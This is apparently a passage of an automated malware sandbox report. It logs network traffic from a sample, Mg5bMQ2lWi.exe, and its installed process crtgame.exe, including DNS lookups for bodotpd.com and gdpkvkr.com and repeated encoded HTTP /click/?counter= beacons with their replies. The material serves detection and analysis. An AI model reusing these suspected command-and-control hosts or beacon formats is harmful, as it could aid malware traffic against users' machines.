Dec 15, 2024 00:53:57.928294897 CET	49872	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:57.928375959 CET	49866	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:58.048063040 CET	80	49872	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:59.329875946 CET	80	49872	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:59.329962969 CET	49872	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:59.448292017 CET	49872	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:59.448561907 CET	49875	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:59.568417072 CET	80	49875	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:59.568468094 CET	80	49872	185.237.206.129	192.168.2.4
Dec 15, 2024 00:53:59.568509102 CET	49872	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:59.568613052 CET	49875	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:59.568718910 CET	49875	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:53:59.688443899 CET	80	49875	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:00.858733892 CET	80	49875	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:00.858930111 CET	49875	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:00.964185953 CET	49875	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:00.964343071 CET	49880	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:01.084192991 CET	80	49880	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:01.084336042 CET	49880	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:01.084394932 CET	80	49875	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:01.084453106 CET	49880	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:01.084804058 CET	49875	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:01.204252958 CET	80	49880	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:02.418303967 CET	80	49880	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:02.418389082 CET	49880	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:02.528295040 CET	49880	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:02.528795004 CET	49885	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:02.648679972 CET	80	49885	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:02.648720026 CET	80	49880	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:02.648804903 CET	49880	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:02.649027109 CET	49885	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:02.649027109 CET	49885	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:02.768918037 CET	80	49885	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:04.014514923 CET	80	49885	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:04.014559031 CET	80	49885	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:04.014736891 CET	49885	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:04.014736891 CET	49885	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:04.015182972 CET	49888	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:54:04.135299921 CET	2023	49888	89.105.201.183	192.168.2.4
Dec 15, 2024 00:54:04.135449886 CET	49888	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:54:04.135512114 CET	49888	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:54:04.135858059 CET	49888	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:54:04.247644901 CET	49885	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:04.247946024 CET	49889	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:04.255394936 CET	2023	49888	89.105.201.183	192.168.2.4
Dec 15, 2024 00:54:04.255685091 CET	2023	49888	89.105.201.183	192.168.2.4
Dec 15, 2024 00:54:04.367778063 CET	80	49889	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:04.367933989 CET	80	49885	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:04.369046926 CET	49889	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:04.369048119 CET	49889	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:04.369081020 CET	49885	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:04.489118099 CET	80	49889	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:05.136492014 CET	2023	49888	89.105.201.183	192.168.2.4
Dec 15, 2024 00:54:05.136785030 CET	49888	2023	192.168.2.4	89.105.201.183
Dec 15, 2024 00:54:05.705007076 CET	80	49889	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:05.707108021 CET	49889	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:05.825870037 CET	49889	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:05.826165915 CET	49894	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:05.945993900 CET	80	49894	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:05.946032047 CET	80	49889	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:05.946084976 CET	49894	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:05.946178913 CET	49889	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:05.946388960 CET	49894	80	192.168.2.4	185.237.206.129
Dec 15, 2024 00:54:06.066200018 CET	80	49894	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:07.245379925 CET	80	49894	185.237.206.129	192.168.2.4
Dec 15, 2024 00:54:07.245776892 CET	49894	80	192.168.2.4	185.237.206.129

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 15, 2024 00:52:56.830883980 CET	51057	53	192.168.2.4	141.98.234.31
Dec 15, 2024 00:52:57.249429941 CET	53	51057	141.98.234.31	192.168.2.4
Dec 15, 2024 00:53:36.886642933 CET	61262	53	192.168.2.4	194.49.94.194
Dec 15, 2024 00:53:37.901808977 CET	61262	53	192.168.2.4	194.49.94.194
Dec 15, 2024 00:53:38.917215109 CET	61262	53	192.168.2.4	194.49.94.194
Dec 15, 2024 00:53:40.917218924 CET	61262	53	192.168.2.4	194.49.94.194
Dec 15, 2024 00:53:44.917165995 CET	61262	53	192.168.2.4	194.49.94.194
Dec 15, 2024 00:53:48.937347889 CET	53588	53	192.168.2.4	152.89.198.214
Dec 15, 2024 00:53:49.203010082 CET	53	53588	152.89.198.214	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 15, 2024 00:52:56.830883980 CET	192.168.2.4	141.98.234.31	0x1141	Standard query (0)	bodotpd.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:53:36.886642933 CET	192.168.2.4	194.49.94.194	0x2e93	Standard query (0)	gdpkvkr.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:53:37.901808977 CET	192.168.2.4	194.49.94.194	0x2e93	Standard query (0)	gdpkvkr.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:53:38.917215109 CET	192.168.2.4	194.49.94.194	0x2e93	Standard query (0)	gdpkvkr.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:53:40.917218924 CET	192.168.2.4	194.49.94.194	0x2e93	Standard query (0)	gdpkvkr.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:53:44.917165995 CET	192.168.2.4	194.49.94.194	0x2e93	Standard query (0)	gdpkvkr.com	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:53:48.937347889 CET	192.168.2.4	152.89.198.214	0x6354	Standard query (0)	gdpkvkr.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 15, 2024 00:52:57.249429941 CET	141.98.234.31	192.168.2.4	0x1141	No error (0)	bodotpd.com		94.232.249.187	A (IP address)	IN (0x0001)	false
Dec 15, 2024 00:53:49.203010082 CET	152.89.198.214	192.168.2.4	0x6354	No error (0)	gdpkvkr.com		185.237.206.129	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bodotpd.com

gdpkvkr.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	94.232.249.187	80	5824	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:52:57.448066950 CET	295	OUT	GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1 Host: bodotpd.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49764	94.232.249.187	80	5824	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:53:10.601617098 CET	295	OUT	GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1 Host: bodotpd.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49790	94.232.249.187	80	5824	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:53:23.860173941 CET	295	OUT	GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1 Host: bodotpd.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49847	185.237.206.129	80	5824	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:53:49.326066017 CET	295	OUT	GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f528166429e289d5b86953e226c55f676647fc2813369d184da3259568dd906fa19cb HTTP/1.1 Host: gdpkvkr.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 15, 2024 00:53:50.705348015 CET	1120	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 23:53:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 33 39 30 0d 0a 64 65 32 66 66 65 39 31 32 63 31 61 35 32 35 39 65 62 32 33 36 34 33 64 36 63 30 65 61 38 35 39 33 35 66 65 30 61 34 38 39 65 34 66 30 38 63 35 66 38 61 66 39 31 61 66 65 61 36 38 38 63 33 66 30 66 33 66 31 63 39 36 39 32 30 39 64 30 34 61 35 37 39 64 30 61 64 33 30 33 38 37 31 31 61 38 62 66 66 34 34 66 39 62 34 38 39 36 33 66 30 31 38 64 32 66 38 30 35 39 38 36 39 61 33 61 32 38 36 64 34 33 61 32 32 31 32 62 37 30 63 32 39 35 37 39 32 61 38 65 39 37 64 61 33 37 35 33 34 63 38 36 64 62 30 63 66 38 31 31 63 65 64 39 35 37 62 32 32 37 33 39 30 31 35 36 63 62 35 66 33 66 64 39 35 61 66 65 32 32 38 37 34 37 34 64 61 62 32 64 65 61 61 35 31 31 39 31 35 62 35 64 62 63 62 36 61 62 38 38 65 39 64 36 61 33 34 62 65 31 66 62 62 65 39 32 64 65 32 36 33 39 38 32 31 65 62 63 33 33 65 62 36 66 31 38 61 38 62 38 36 30 61 65 30 34 63 31 62 36 37 38 39 30 31 65 61 65 63 62 39 32 33 38 34 32 39 64 62 39 64 32 33 32 39 64 65 33 38 30 66 65 31 61 66 39 34 31 63 30 35 32 32 36 63 36 32 30 61 66 39 32 32 [TRUNCATED] Data Ascii: 390de2ffe912c1a5259eb23643d6c0ea85935fe0a489e4f08c5f8af91afea688c3f0f3f1c969209d04a579d0ad3038711a8bff44f9b48963f018d2f8059869a3a286d43a2212b70c295792a8e97da37534c86db0cf811ced957b227390156cb5f3fd95afe2287474dab2deaa511915b5dbcb6ab88e9d6a34be1fbbe92de2639821ebc33eb6f18a8b860ae04c1b678901eaecb9238429db9d2329de380fe1af941c05226c620af9225c3710c4f4f8ddcf1dbf27278493f3bb766ffb9222d3da3c77c793a1cff9e605e55a34dbea7fbd03f3f181e2a5bdb06d1420d55f60e073e80f1c07c8c83dc89075636c7b0436ff8fb745194e8568518fc09469d27ccf2a22456ec67cf613868a94af4f5d81a2506c3be88ddc9ed4f78de501d870629d7258cc37f135664174a81c2019fce96266489dac33c7101ba2151dcdf294e1b1ab90be7ed675f8043efe90414b7a7f7754a155793506ebcf6a0d9c11ea1760ca034e51f66007845d855c7e01226955272ecc5ca8ce526d1e53f3a17ad6513aa1c1a93e9af12e9dba705d9b98be9b96415f8d7bbde792c2371a97d9e80572d9b4d862e06fe1f69e072144da477d671a19d9996c1d51a78b58b9aac244550fc613cfae58023e0ae9a91677c280
Dec 15, 2024 00:53:54.089119911 CET	303	OUT	GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1 Host: gdpkvkr.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 15, 2024 00:53:54.522368908 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 23:53:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49860	185.237.206.129	80	5824	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:53:54.756535053 CET	303	OUT	GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1 Host: gdpkvkr.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 15, 2024 00:53:56.045377970 CET	976	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 23:53:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 33 30 30 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 63 30 65 35 35 38 32 34 65 30 66 64 62 65 37 61 36 39 31 62 39 61 35 32 62 63 65 36 64 36 31 37 63 35 62 63 66 64 64 35 33 64 63 34 38 35 66 63 62 34 39 38 39 35 61 65 61 34 31 66 36 62 62 66 36 34 34 39 39 35 36 39 37 33 39 30 61 39 32 32 66 38 35 34 37 39 61 39 63 33 66 33 63 36 65 34 36 61 31 33 66 32 34 37 37 63 39 39 32 36 37 32 64 38 38 38 32 64 61 33 36 35 66 34 63 38 65 64 33 30 37 65 37 31 30 63 39 63 37 35 64 62 33 32 66 33 35 31 65 35 34 63 62 35 63 32 61 64 61 35 63 66 38 32 32 38 32 34 61 34 36 62 30 32 63 65 64 62 62 31 62 39 30 35 30 35 32 61 33 62 37 61 33 38 39 66 63 64 36 61 35 35 36 66 65 66 61 62 30 39 61 63 31 32 37 33 39 38 35 30 62 62 63 33 39 65 64 37 62 31 38 61 30 62 39 37 65 61 34 30 32 64 62 62 35 36 36 39 39 31 37 61 64 64 35 39 30 33 39 34 62 38 32 62 39 64 33 32 39 39 36 65 35 38 32 65 30 31 62 66 32 34 66 64 62 34 64 32 64 63 33 33 34 61 66 39 36 32 [TRUNCATED] Data Ascii: 300de2fe88e261d4749b96478393969f80739fc0e55824e0fdbe7a691b9a52bce6d617c5bcfdd53dc485fcb49895aea41f6bbf644995697390a922f85479a9c3f3c6e46a13f2477c992672d8882da365f4c8ed307e710c9c75db32f351e54cb5c2ada5cf822824a46b02cedbb1b905052a3b7a389fcd6a556fefab09ac12739850bbc39ed7b18a0b97ea402dbb5669917add590394b82b9d32996e582e01bf24fdb4d2dc334af9620dd7809424792ddf2d9e7777155203eb47df7ba20333ea8c47a67381aea9e635355a74aa9a9fbce3e3914132345da02db540d49f61006208bf4c1628d8cd8840b4830c4a54166f8f8715380ed509b19f30b418325c7f1ba274ee87cd0643e62b348f4f0d91f2d18c1b68cc4c5f55379c45e18990722de298bdd7a1d40600a4b9bc31f9bc393386189dbc03b791fb3284bc6de32470510b708f9ec6b5f8f58eeed0c09b7bef36a4b0b5c945770beffafd7dc1fa47e19a338e61f66037151db56d9e21b248b5073e3d3c997e339d4f93b3511b3641bab181296c70

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49866	185.237.206.129	80	5824	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:53:56.397176027 CET	303	OUT	GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1 Host: gdpkvkr.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 15, 2024 00:53:57.696259022 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 23:53:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49872	185.237.206.129	80	5824	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:53:57.928294897 CET	303	OUT	GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1 Host: gdpkvkr.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 15, 2024 00:53:59.329875946 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 23:53:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49875	185.237.206.129	80	5824	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:53:59.568718910 CET	303	OUT	GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1 Host: gdpkvkr.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 15, 2024 00:54:00.858733892 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 23:54:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49880	185.237.206.129	80	5824	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:54:01.084453106 CET	303	OUT	GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1 Host: gdpkvkr.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 15, 2024 00:54:02.418303967 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 23:54:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49885	185.237.206.129	80	5824	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:54:02.649027109 CET	303	OUT	GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1 Host: gdpkvkr.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 15, 2024 00:54:04.014514923 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 23:54:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 34 65 34 0d 0a 64 65 32 66 65 38 38 65 32 36 31 64 34 37 34 39 62 39 36 34 37 38 33 39 33 39 36 39 66 38 30 37 33 39 66 38 30 61 34 38 39 64 34 66 30 31 63 35 66 62 61 31 38 63 62 64 62 31 32 66 63 38 36 37 36 30 37 37 35 32 63 62 63 38 35 30 64 64 34 39 35 66 63 34 34 36 38 39 35 65 65 64 34 32 65 39 62 32 66 36 34 65 39 33 35 32 39 32 32 37 30 39 39 62 33 30 38 32 35 39 39 65 38 32 33 61 32 61 36 36 34 30 61 32 32 31 32 30 37 39 63 61 39 33 37 39 32 63 38 62 38 39 63 35 33 37 35 61 35 33 39 31 64 61 30 30 66 62 31 62 63 62 64 39 35 63 62 33 32 64 33 36 31 61 34 61 63 39 35 64 32 37 63 35 35 38 66 61 32 32 38 61 34 35 34 64 61 62 32 64 65 61 61 35 31 31 39 35 34 36 35 65 61 33 61 39 61 36 38 31 65 39 64 31 61 36 35 66 65 31 66 62 62 37 39 38 64 34 32 35 33 31 39 63 31 34 62 63 33 31 66 30 37 30 31 38 61 34 61 37 37 63 61 37 30 39 64 65 62 37 37 38 39 38 31 66 61 65 63 32 39 31 32 36 34 61 39 61 61 36 64 32 32 34 38 32 65 33 38 62 65 61 31 61 66 39 34 36 64 65 35 38 32 37 63 30 33 34 61 63 39 31 32 [TRUNCATED] Data Ascii: 4e4de2fe88e261d4749b96478393969f80739f80a489d4f01c5fba18cbdb12fc867607752cbc850dd495fc446895eed42e9b2f64e93529227099b3082599e823a2a6640a2212079ca93792c8b89c5375a5391da00fb1bcbd95cb32d361a4ac95d27c558fa228a454dab2deaa51195465ea3a9a681e9d1a65fe1fbb798d425319c14bc31f07018a4a77ca709deb778981faec291264a9aa6d22482e38bea1af946de5827c034ac912cdd7e0c554f91d9f8d8ec7079402033b07df4b02b3334a1d07061321be19f64504aa74ca9aff9d1213e1b1b3c40d908d15c0f57ff1305208bfac4628e89d5900e4b35ceaf476ee6f1735e9bf7548018e90344873bc5f4b62450ed79c5673c61b34bf2f5cd1d2e18dfbb8bc9cceb5179d15819851825d03d8fdf730841651e4b9fc00191c594207a8bd1c1257b1abb3f4bddd5324f1b12b80fe4e872568d5cf0ec0014b7a0f8614e155d915b6fbff8b7dcd71eba7f15bc31e3096d06704fdd5ec6ea12398a5771f6dacb8efc39dae4333114ad6518a0191088f6ad14f6c7a004d9b183efb36515f3dfb2c97d332669b5799f9b482795418c2f10af5a26bf155613f72f967eb5cec2d199b05929f6c89cbb711111a9392ffce19526e0ac9b996e7918aa895df86be2ffd3383c69624c53664263c9775bacd8e64ca3f136715bfdebf9771200011579b8529bc79bf6d872279 [TRUNCATED]
Dec 15, 2024 00:54:04.014559031 CET	224	IN	Data Raw: 62 33 34 32 65 65 33 38 30 31 31 32 65 64 65 31 37 36 61 66 35 62 31 31 33 39 33 33 65 62 31 66 34 35 64 39 33 30 39 36 36 38 61 63 36 64 37 36 30 64 61 37 64 62 39 38 66 63 34 31 30 35 61 61 66 64 65 38 37 36 62 37 36 66 31 37 62 65 31 37 30 61 Data Ascii: b342ee380112ede176af5b113933eb1f45d9309668ac6d760da7db98fc4105aafde876b76f17be170adade9cfed9e18493a3a80794bb9777fa7a57162541283ae0367fb6631ab927bf4b8466f616ffe732565a2c4186940f5c3c099f4fc9109e6773a79d7a150c8b43f29c4d40

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49889	185.237.206.129	80	5824	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:54:04.369048119 CET	303	OUT	GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1 Host: gdpkvkr.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 15, 2024 00:54:05.705007076 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 23:54:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49894	185.237.206.129	80	5824	C:\Program Files (x86)\CRTGame\crtgame.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:54:05.946388960 CET	303	OUT	GET /click/?counter=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925be849e1a4a21bca13c034069738dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ccd95fbb23 HTTP/1.1 Host: gdpkvkr.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Dec 15, 2024 00:54:07.245379925 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sat, 14 Dec 2024 23:54:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 64 65 32 66 66 34 39 61 32 65 31 31 33 37 0d 0a 30 0d 0a 0d 0a Data Ascii: ede2ff49a2e11370

Target ID:	0
Start time:	18:52:01
Start date:	14/12/2024
Path:	C:\Users\user\Desktop\Mg5bMQ2lWi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Mg5bMQ2lWi.exe"
Imagebase:	0x400000
File size:	7'240'000 bytes
MD5 hash:	7700EBA1CEAA134B1DA16D1EDE0E7894
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	18:52:01
Start date:	14/12/2024
Path:	C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp" /SL5="$1043A,6985375,54272,C:\Users\user\Desktop\Mg5bMQ2lWi.exe"
Imagebase:	0x400000
File size:	704'000 bytes
MD5 hash:	F448D7F4B76E5C9C3A4EAFF16A8B9B73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	18:52:04
Start date:	14/12/2024
